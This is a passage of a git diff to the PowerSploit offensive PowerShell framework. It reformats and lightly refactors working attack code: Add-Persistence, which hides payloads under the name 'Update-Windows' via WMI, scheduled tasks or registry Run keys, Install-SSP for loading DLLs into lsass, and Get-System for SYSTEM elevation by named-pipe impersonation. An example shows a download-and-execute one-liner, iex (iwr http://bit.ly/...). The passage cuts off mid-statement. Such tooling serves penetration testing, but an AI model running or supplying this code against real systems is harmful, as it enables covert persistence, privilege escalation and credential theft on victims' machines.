'2 AM', '23:00:00', or '4:06:26 PM'. .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup +$ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup .EXAMPLE - C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] [Switch] @@ -189,68 +191,70 @@ function New-UserPersistenceOption <# .SYNOPSIS - Configure user-level persistence options for the Add-Persistence function. +Configure user-level persistence options for the Add-Persistence function. + +PowerSploit Function: New-UserPersistenceOption +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None - PowerSploit Function: New-UserPersistenceOption - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None - .DESCRIPTION - New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. +New-UserPersistenceOption allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. .PARAMETER ScheduledTask - Persist via a scheduled task. +Persist via a scheduled task. - Detection Difficulty: Moderate - Removal Difficulty: Moderate - User Detectable? No +Detection Difficulty: Moderate +Removal Difficulty: Moderate +User Detectable? No .PARAMETER Registry - Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. +Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. - Detection Difficulty: Easy - Removal Difficulty: Easy - User Detectable? Yes +Detection Difficulty: Easy +Removal Difficulty: Easy +User Detectable? Yes .PARAMETER AtLogon - Starts the payload upon any user logon. +Starts the payload upon any user logon. .PARAMETER OnIdle - Starts the payload after one minute of idling. +Starts the payload after one minute of idling. .PARAMETER Daily - Starts the payload daily. +Starts the payload daily. .PARAMETER Hourly - Starts the payload hourly. +Starts the payload hourly. .PARAMETER At - Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. +Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. .EXAMPLE - C:\PS> $UserOptions = New-UserPersistenceOption -Registry -AtLogon +$UserOptions = New-UserPersistenceOption -Registry -AtLogon .EXAMPLE - C:\PS> $UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [CmdletBinding()] + Param ( [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )] [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] @@ -333,99 +337,104 @@ function Add-Persistence <# .SYNOPSIS - Add persistence capabilities to a script. +Add persistence capabilities to a script. + +PowerSploit Function: Add-Persistence +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption +Optional Dependencies: None - PowerSploit Function: Add-Persistence - Author: Matthew Graeber (@mattifestation) - License: BSD 3-Clause - Required Dependencies: New-ElevatedPersistenceOption, New-UserPersistenceOption - Optional Dependencies: None - .DESCRIPTION - Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. +Add-Persistence will add persistence capabilities to any script or scriptblock. This function will output both the newly created script with persistence capabilities as well a script that will remove a script after it has been persisted. .PARAMETER ScriptBlock - Specifies a scriptblock containing your payload. +Specifies a scriptblock containing your payload. .PARAMETER FilePath - Specifies the path to your payload. +Specifies the path to your payload. .PARAMETER ElevatedPersistenceOption - Specifies the trigger for the persistent payload if the target is running elevated. - You must run New-ElevatedPersistenceOption to generate this argument. +Specifies the trigger for the persistent payload if the target is running elevated. +You must run New-ElevatedPersistenceOption to generate this argument. .PARAMETER UserPersistenceOption - Specifies the trigger for the persistent payload if the target is not running elevated. - You must run New-UserPersistenceOption to generate this argument. +Specifies the trigger for the persistent payload if the target is not running elevated. +You must run New-UserPersistenceOption to generate this argument. .PARAMETER PersistenceScriptName - Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. +Specifies the name of the function that will wrap the original payload. The default value is 'Update-Windows'. .PARAMETER DoNotPersistImmediately - Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. +Output only the wrapper function for the original payload. By default, Add-Persistence will output a script that will automatically attempt to persist (e.g. it will end with 'Update-Windows -Persist'). If you are in a position where you are running in memory but want to persist at a later time, use this option. .PARAMETER PersistentScriptFilePath - Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. +Specifies the path where you would like to output the persistence script. By default, Add-Persistence will write the removal script to 'Persistence.ps1' in the current directory. .PARAMETER RemovalScriptFilePath - Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. +Specifies the path where you would like to output a script that will remove the persistent payload. By default, Add-Persistence will write the removal script to 'RemovePersistence.ps1' in the current directory. .PARAMETER PassThru - Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. +Outputs the contents of the persistent script to the pipeline. This option is useful when you want to write the original persistent script to disk and pass the script to Out-EncodedCommand via the pipeline. .INPUTS - None +None - Add-Persistence cannot receive any input from the pipeline. +Add-Persistence cannot receive any input from the pipeline. .OUTPUTS - System.Management.Automation.ScriptBlock +System.Management.Automation.ScriptBlock - If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. +If the '-PassThru' switch is provided, Add-Persistence will output a scriptblock containing the contents of the persistence script. .NOTES - When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. +When the persistent script executes, it will not generate any meaningful output as it was designed to run as silently as possible on the victim's machine. .EXAMPLE - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' - C:\PS>$UserOptions = New-UserPersistenceOption -Registry -AtLogon - C:\PS>Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose +$ElevatedOptions = New-ElevatedPersistenceOption -PermanentWMI -Daily -At '3 PM' +$UserOptions = New-UserPersistenceOption -Registry -AtLogon +Add-Persistence -FilePath .\EvilPayload.ps1 -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose - Description - ----------- - Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. +Description +----------- +Creates a script containing the contents of EvilPayload.ps1 that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. .EXAMPLE - C:\PS>$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } - C:\PS>$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle - C:\PS>$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle - C:\PS>Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 +$Rickroll = { iex (iwr http://bit.ly/e0Mw9w ) } +$ElevatedOptions = New-ElevatedPersistenceOption -ScheduledTask -OnIdle +$UserOptions = New-UserPersistenceOption -ScheduledTask -OnIdle +Add-Persistence -ScriptBlock $RickRoll -ElevatedPersistenceOption $ElevatedOptions -UserPersistenceOption $UserOptions -Verbose -PassThru | Out-EncodedCommand | Out-File .\EncodedPersistentScript.ps1 - Description - ----------- - Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 +Description +----------- +Creates a script containing the contents of the provided scriptblock that when executed with the '-Persist' switch will persist the payload using its respective persistence mechanism (user-mode vs. elevated) determined at runtime. The output is then passed through to Out-EncodedCommand so that it can be executed in a single command line statement. The final, encoded output is finally saved to .\EncodedPersistentScript.ps1 .LINK - http://www.exploit-monday.com +http://www.exploit-monday.com #> - - [CmdletBinding()] Param ( + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')] + [CmdletBinding()] + Param ( [Parameter( Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock' )] [ValidateNotNullOrEmpty()] [ScriptBlock] @@ -527,7 +536,6 @@ function Add-Persistence #region Initialize data - $CompressedScript = '' $UserTrigger = '' $UserTriggerRemoval = '' $ElevatedTrigger = "''" @@ -598,7 +606,7 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj { $ElevatedTrigger = "schtasks /Create /RU system /SC ONLOGON /TN Updater /TR " } - + 'Daily' { $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR " @@ -732,11 +740,13 @@ else $PersistenceRemoval = @" # Execute the following to remove the elevated persistent payload $ElevatedTriggerRemoval +(gc `$PROFILE.AllUsersAllHosts) -replace '[\s]{600}.+',''| Out-File `$PROFILE.AllUsersAllHosts -Fo # Execute the following to remove the user-level persistent payload $UserTriggerRemoval +(gc `$PROFILE.CurrentUserAllHosts) -replace '[\s]{600}.+',''| Out-File `$PROFILE.CurrentUserAllHosts -Fo "@ - + $PersistantScript | Out-File $PersistentScriptFile Write-Verbose "Persistence script written to $PersistentScriptFile" @@ -759,10 +769,10 @@ function Install-SSP Installs a security support provider (SSP) dll. -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION @@ -785,7 +795,12 @@ if you are running a 64-bit OS. In order for the SSP dll to be loaded properly into lsass, the dll must export SpLsaModeInitialize. #> - [CmdletBinding()] Param ( + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingCmdletAliases', '')] + [CmdletBinding()] + Param ( [ValidateScript({Test-Path (Resolve-Path $_)})] [String] $Path @@ -811,43 +826,43 @@ into lsass, the dll must export SpLsaModeInitialize. [String] $Path ) - + # Parse PE header to see if binary was compiled 32 or 64-bit $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) - + [Byte[]] $MZHeader = New-Object Byte[](2) $FileStream.Read($MZHeader,0,2) | Out-Null - + $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) if ($Header -ne 'MZ') { $FileStream.Close() Throw 'Invalid PE header.' } - + # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null - + [Byte[]] $lfanew = New-Object Byte[](4) - + # Read offset to the PE Header (will be read in reverse) $FileStream.Read($lfanew,0,4) | Out-Null - $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) - + $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join '')) + # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) - + # Read compiled architecture $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null - $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') + $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '') $FileStream.Close() - + if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) { Throw 'Invalid PE header or unsupported architecture.' } - + if ($Architecture -eq '014C') { Write-Output '32-bit' @@ -875,7 +890,7 @@ into lsass, the dll must export SpLsaModeInitialize. # Get the dll filename without the extension. # This will be added to the registry. - $DllName = $Dll | % { % {($_ -split '\.')[0]} } + $DllName = $Dll | ForEach-Object { % {($_ -split '\.')[0]} } # Enumerate all of the currently installed SSPs $SecurityPackages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' | @@ -928,7 +943,8 @@ into lsass, the dll must export SpLsaModeInitialize. if ([IntPtr]::Size -eq 4) { $StructSize = 20 - } else { + } + else { $StructSize = 24 } @@ -939,7 +955,8 @@ into lsass, the dll must export SpLsaModeInitialize. try { $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr) - } catch { + } + catch { $HResult = $Error[0].Exception.InnerException.HResult Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))" Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)" @@ -948,34 +965,37 @@ into lsass, the dll must export SpLsaModeInitialize. if ($RuntimeSuccess) { Write-Verbose 'Installation and loading complete!' - } else { + } + else { Write-Verbose 'Installation complete! Reboot for changes to take effect.' } } -function Get-SecurityPackages +function Get-SecurityPackage { <# .SYNOPSIS Enumerates all loaded security packages (SSPs). -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION -Get-SecurityPackages is a wrapper for secur32!EnumerateSecurityPackages. +Get-SecurityPackage is a wrapper for secur32!EnumerateSecurityPackages. It also parses the returned SecPkgInfo struct array. .EXAMPLE -Get-SecurityPackages +Get-SecurityPackage #> - [CmdletBinding()] Param() + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [CmdletBinding()] + Param() #region P/Invoke declarations for secur32.dll $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI') @@ -1084,4 +1104,4 @@ Get-SecurityPackages $SecPackage } -} \ No newline at end of file +} diff --git a/PowerSploit.psd1 b/PowerSploit.psd1 index 065ea684..3b6976f0 100644 --- a/PowerSploit.psd1 +++ b/PowerSploit.psd1 @@ -90,11 +90,11 @@ FunctionsToExport = @( 'Get-RegistryAutoLogon', 'Get-SecurityPackages', 'Get-ServiceDetail', - 'Get-ServiceUnquoted', 'Get-SiteListPassword', 'Get-System', 'Get-TimedScreenshot', 'Get-UnattendedInstallFile', + 'Get-UnquotedService', 'Get-UserEvent', 'Get-UserProperty', 'Get-VaultCredential', @@ -103,7 +103,6 @@ FunctionsToExport = @( 'Install-ServiceBinary', 'Install-SSP', 'Invoke-ACLScanner', - 'Invoke-AllChecks', 'Invoke-CheckLocalAdminAccess', 'Invoke-CredentialInjection', 'Invoke-DllInjection', @@ -114,6 +113,7 @@ FunctionsToExport = @( 'Invoke-Mimikatz', 'Invoke-NinjaCopy', 'Invoke-Portscan', + 'Invoke-PrivescAudit', 'Invoke-ProcessHunter', 'Invoke-ReflectivePEInjection', 'Invoke-ReverseDnsLookup', diff --git a/PowerSploit.psm1 b/PowerSploit.psm1 index 9bc02403..42a91746 100644 --- a/PowerSploit.psm1 +++ b/PowerSploit.psm1 @@ -1 +1 @@ -Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and ($_.Name -ne 'Tests') } | % { Import-Module $_.FullName -DisableNameChecking } +Get-ChildItem $PSScriptRoot | ? { $_.PSIsContainer -and !('Tests','docs' -contains $_.Name) } | % { Import-Module $_.FullName -DisableNameChecking } diff --git a/Privesc/Get-System.ps1 b/Privesc/Get-System.ps1 index f2b8014a..fdb41d00 100644 --- a/Privesc/Get-System.ps1 +++ b/Privesc/Get-System.ps1 @@ -1,103 +1,109 @@ function Get-System { <# - .SYNOPSIS +.SYNOPSIS - GetSystem functionality inspired by Meterpreter's getsystem. - 'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create - a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. - NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure - token duplication works correctly. +GetSystem functionality inspired by Meterpreter's getsystem. - PowerSploit Function: Get-System - Author: @harmj0y, @mattifestation - License: BSD 3-Clause - Required Dependencies: None - Optional Dependencies: None +Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: PSReflect - .PARAMETER Technique +.DESCRIPTION - The technique to use, 'NamedPipe' or 'Token'. +Executes "getsystem" functionality similar to Meterpreter. +'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create +a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. +NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure +token duplication works correctly. - .PARAMETER ServiceName - The name of the service used with named pipe impersonation, defaults to 'TestSVC'. +.PARAMETER Technique - .PARAMETER PipeName +The technique to use, 'NamedPipe' or 'Token'. - The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. +.PARAMETER ServiceName - .PARAMETER RevToSelf - - Reverts the current thread privileges. +The name of the service used with named pipe impersonation, defaults to 'TestSVC'. - .PARAMETER WhoAmI +.PARAMETER PipeName - Switch. Display the credentials for the current PowerShell thread. +The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. - .EXAMPLE - - PS> Get-System +.PARAMETER RevToSelf - Uses named impersonate to elevate the current thread token to SYSTEM. +Reverts the current thread privileges. - .EXAMPLE - - PS> Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' +.PARAMETER WhoAmI - Uses named impersonate to elevate the current thread token to SYSTEM - with a custom service and pipe name. +Switch. Display the credentials for the current PowerShell thread. - .EXAMPLE - - PS> Get-System -Technique Token +.EXAMPLE - Uses token duplication to elevate the current thread token to SYSTEM. +Get-System - .EXAMPLE - - PS> Get-System -WhoAmI +Uses named impersonate to elevate the current thread token to SYSTEM. - Displays the credentials for the current thread. +.EXAMPLE - .EXAMPLE - - PS> Get-System -RevToSelf +Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' - Reverts the current thread privileges. +Uses named impersonate to elevate the current thread token to SYSTEM +with a custom service and pipe name. - .LINK - - https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c - https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot - http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ - http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/ +.EXAMPLE + +Get-System -Technique Token + +Uses token duplication to elevate the current thread token to SYSTEM. + +.EXAMPLE + +Get-System -WhoAmI + +Displays the credentials for the current thread. + +.EXAMPLE + +Get-System -RevToSelf + +Reverts the current thread privileges. + +.LINK + +https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/ #> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')] [CmdletBinding(DefaultParameterSetName = 'NamedPipe')] param( - [Parameter(ParameterSetName = "NamedPipe")] - [Parameter(ParameterSetName = "Token")] + [Parameter(ParameterSetName = 'NamedPipe')] + [Parameter(ParameterSetName = 'Token')] [String] - [ValidateSet("NamedPipe", "Token")] + [ValidateSet('NamedPipe', 'Token')] $Technique = 'NamedPipe', - [Parameter(ParameterSetName = "NamedPipe")] + [Parameter(ParameterSetName = 'NamedPipe')] [String] $ServiceName = 'TestSVC', - [Parameter(ParameterSetName = "NamedPipe")] + [Parameter(ParameterSetName = 'NamedPipe')] [String] $PipeName = 'TestSVC', - [Parameter(ParameterSetName = "RevToSelf")] + [Parameter(ParameterSetName = 'RevToSelf')] [Switch] $RevToSelf, - [Parameter(ParameterSetName = "WhoAmI")] + [Parameter(ParameterSetName = 'WhoAmI')] [Switch] $WhoAmI ) - $ErrorActionPreference = "Stop" + $ErrorActionPreference = 'Stop' # from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html function Local:Get-DelegateType @@ -105,11 +111,11 @@ function Get-System { Param ( [OutputType([Type])] - + [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), - + [Parameter( Position = 1 )] [Type] $ReturnType = [Void] @@ -124,7 +130,7 @@ function Get-System { $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') - + Write-Output $TypeBuilder.CreateType() } @@ -134,11 +140,11 @@ function Get-System { Param ( [OutputType([IntPtr])] - + [Parameter( Position = 0, Mandatory = $True )] [String] $Module, - + [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure @@ -155,7 +161,7 @@ function Get-System { $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - + # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } @@ -165,10 +171,10 @@ function Get-System { function Local:Get-SystemNamedPipe { param( [String] - $ServiceName = "TestSVC", + $ServiceName = 'TestSVC', [String] - $PipeName = "TestSVC" + $PipeName = 'TestSVC' ) $Command = "%COMSPEC% /C start %COMSPEC% /C `"timeout /t 3 >nul&&echo $PipeName > \\.\pipe\$PipeName`"" @@ -177,14 +183,14 @@ function Get-System { # create the named pipe used for impersonation and set appropriate permissions $PipeSecurity = New-Object System.IO.Pipes.PipeSecurity - $AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" ) + $AccessRule = New-Object System.IO.Pipes.PipeAccessRule('Everyone', 'ReadWrite', 'Allow') $PipeSecurity.AddAccessRule($AccessRule) - $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName,"InOut",100, "Byte", "None", 1024, 1024, $PipeSecurity) + $Pipe = New-Object System.IO.Pipes.NamedPipeServerStream($PipeName, 'InOut', 100, 'Byte', 'None', 1024, 1024, $PipeSecurity) $PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle() # Declare/setup all the needed API function - # adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html + # adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html $ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient $ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int]) $ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate) @@ -196,11 +202,11 @@ function Get-System { $OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA $OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr]) $OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate) - + $OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA $OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr]) $OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate) - + $CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA $CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr]) $CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate) @@ -220,9 +226,9 @@ function Get-System { # Step 1 - OpenSCManager() # 0xF003F = SC_MANAGER_ALL_ACCESS # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx - Write-Verbose "Opening service manager" - $ManagerHandle = $OpenSCManagerA.Invoke("\\localhost", "ServicesActive", 0xF003F) - Write-Verbose "Service manager handle: $ManagerHandle" + Write-Verbose '[Get-System] Opening service manager' + $ManagerHandle = $OpenSCManagerA.Invoke('\\localhost', 'ServicesActive', 0xF003F) + Write-Verbose "[Get-System] Service manager handle: $ManagerHandle" # if we get a non-zero handle back, everything was successful if ($ManagerHandle -and ($ManagerHandle -ne 0)) { @@ -232,7 +238,7 @@ function Get-System { # 0x10 = SERVICE_WIN32_OWN_PROCESS # 0x3 = SERVICE_DEMAND_START # 0x1 = SERVICE_ERROR_NORMAL - Write-Verbose "Creating new service: '$ServiceName'" + Write-Verbose "[Get-System] Creating new service: '$ServiceName'" try { $ServiceHandle = $CreateServiceA.Invoke($ManagerHandle, $ServiceName, $ServiceName, 0xF003F, 0x10, 0x3, 0x1, $Command, $null, $null, $null, $null, $null) $err = $GetLastError.Invoke() @@ -241,40 +247,40 @@ function Get-System { Write-Warning "Error creating service : $_" $ServiceHandle = 0 } - Write-Verbose "CreateServiceA Handle: $ServiceHandle" + Write-Verbose "[Get-System] CreateServiceA Handle: $ServiceHandle" if ($ServiceHandle -and ($ServiceHandle -ne 0)) { $Success = $True - Write-Verbose "Service successfully created" + Write-Verbose '[Get-System] Service successfully created' # Step 3 - CloseServiceHandle() for the service handle - Write-Verbose "Closing service handle" + Write-Verbose '[Get-System] Closing service handle' $Null = $CloseServiceHandle.Invoke($ServiceHandle) # Step 4 - OpenService() - Write-Verbose "Opening the service '$ServiceName'" + Write-Verbose "[Get-System] Opening the service '$ServiceName'" $ServiceHandle = $OpenServiceA.Invoke($ManagerHandle, $ServiceName, 0xF003F) - Write-Verbose "OpenServiceA handle: $ServiceHandle" + Write-Verbose "[Get-System] OpenServiceA handle: $ServiceHandle" if ($ServiceHandle -and ($ServiceHandle -ne 0)){ # Step 5 - StartService() - Write-Verbose "Starting the service" + Write-Verbose '[Get-System] Starting the service' $val = $StartServiceA.Invoke($ServiceHandle, $null, $null) $err = $GetLastError.Invoke() # if we successfully started the service, let it breathe and then delete it if ($val -ne 0){ - Write-Verbose "Service successfully started" + Write-Verbose '[Get-System] Service successfully started' # breathe for a second Start-Sleep -s 1 } else{ if ($err -eq 1053){ - Write-Verbose "Command didn't respond to start" + Write-Verbose "[Get-System] Command didn't respond to start" } else{ - Write-Warning "StartService failed, LastError: $err" + Write-Warning "[Get-System] StartService failed, LastError: $err" } # breathe for a second Start-Sleep -s 1 @@ -282,48 +288,48 @@ function Get-System { # start cleanup # Step 6 - DeleteService() - Write-Verbose "Deleting the service '$ServiceName'" + Write-Verbose "[Get-System] Deleting the service '$ServiceName'" $val = $DeleteService.invoke($ServiceHandle) $err = $GetLastError.Invoke() if ($val -eq 0){ - Write-Warning "DeleteService failed, LastError: $err" + Write-Warning "[Get-System] DeleteService failed, LastError: $err" } else{ - Write-Verbose "Service successfully deleted" + Write-Verbose '[Get-System] Service successfully deleted' } - - # Step 7 - CloseServiceHandle() for the service handle - Write-Verbose "Closing the service handle" + + # Step 7 - CloseServiceHandle() for the service handle + Write-Verbose '[Get-System] Closing the service handle' $val = $CloseServiceHandle.Invoke($ServiceHandle) - Write-Verbose "Service handle closed off" + Write-Verbose '[Get-System] Service handle closed off' } else { - Write-Warning "[!] OpenServiceA failed, LastError: $err" + Write-Warning "[Get-System] OpenServiceA failed, LastError: $err" } } else { - Write-Warning "[!] CreateService failed, LastError: $err" + Write-Warning 